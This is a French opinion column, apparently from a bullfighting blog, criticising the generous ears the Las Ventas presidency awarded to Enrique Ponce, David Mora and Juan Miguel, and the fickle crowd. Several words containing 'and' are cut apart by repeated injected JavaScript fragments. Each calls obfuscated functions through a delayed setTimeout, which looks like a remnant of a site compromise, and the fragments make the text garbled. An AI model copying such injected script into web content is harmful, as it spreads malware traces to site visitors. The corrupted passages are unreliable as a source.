MADRID OU MADRIDEJOS

Et « Mister Oreillettes » est monté à nouveau au palco et a fait de nouveau des siennes en attribuant une oreille soldée à Enrique Ponce ; oreillette éthérée –d’un poids similaire à celle qu’il avait offerte quinze jours plus tôt à David Mora- qui permit au torero de Chivas d’ouvrir l’une des grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andes portes.

Le comble fut que le lendemain un de ses collègues, non seulement content d’avoir retiré un des novillos en piste pour faire plaisir à un secteur du public, se permit de donner une oreille inexistante au novillero Juan Miguel, pourvu que le garçon puisse la rentabiliser, mais je crains qu’il l’ait surtout trompé.

Cette hémorragie de magnanimité présidentielle nous conduit inévitablement aux odieuses comparaisons, car en honneur à la justice, l’oreille de Juan Miguel aurait dû être pour Jesús Enrique Colombo qui l’avait bien plus méritée ; celle de Mora aurait dû être attribuée à El Fandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andi, demandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andée par bien plus de mouchoirs, et qui lui la méritait réellement, et celle de Ponce aurait dû faire la deuxième de Sébastien Castella qui lui méritait vraiment de sortir par la Grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ande Porte le jour de la corrida de Jandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andilla, même s’il n’y avait pas suffisamment de mouchoirs qui la demandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andaient, puisque le second trophée est de la responsabilité du palco qui, par contre, sortit le mouchoir bleu, avec raison, pour récompenser le taureau d’un tour de piste sans une demandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ande majoritaire.

Cette affaire des mouchoirs nous amène à réfléchir sur les changements de comportement du public de Las Ventas. Peut-être que personne ne peut tenir trente deux jours de corridas d’affilée et qu’ainsi des spectateurs différents modifient le comportement des gradins d’une corrida à l’autre. Sans parler des tribus des hooligans du 7, dont le comportement est aussi changeant et capricieux en fonction des noms des toreros et des élevages qui figurent sur les affiches. Leur exigence augmente ou diminue suivant si celui qui est dans l’arène est « maudit » ou « accepté ». De là qu’ils respectent au maximum Ponce sans lui reprocher son placement, même s’il a toréé presque tout le temps à distance du toro, alors que la possibilité que Roca Rey franchisse la Grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ande Porte provoquait l’ire hors propos cherchant à nuire le vaillant engagement du torero Péruvien. Je ne veux pas me laisser gagner par des théories conspiratives, mais sans cela il m’est difficile de comprendre leur attitude négative dès le départ vis-à-vis du torero émergeant plus solide et capable. Il est vrai que certains jours pour tout un tas de raisons les arènes de Las Ventas semblent être celles de Madrid et d’autres celles de Madridejos, je dis ceci avec tout mon respect vis-à-vis des habitants de cette localité de la province de Tolède. Entre les inquisiteurs, les beaufs, personne n’y comprend plus rien. Ni au palco de la présidence, ni dans les places assises occupées par les spectateurs. Espérons que les prochaines ferias, du moins concernant les présidences et leurs assesseurs, adoptent des postures communes qui évitent des choix erratiques comme ceux de cette année. Pour garder raison et respecter ce qui est juste, les organismes compétents devraient s’y efforcer.

Les commentaires sont fermés.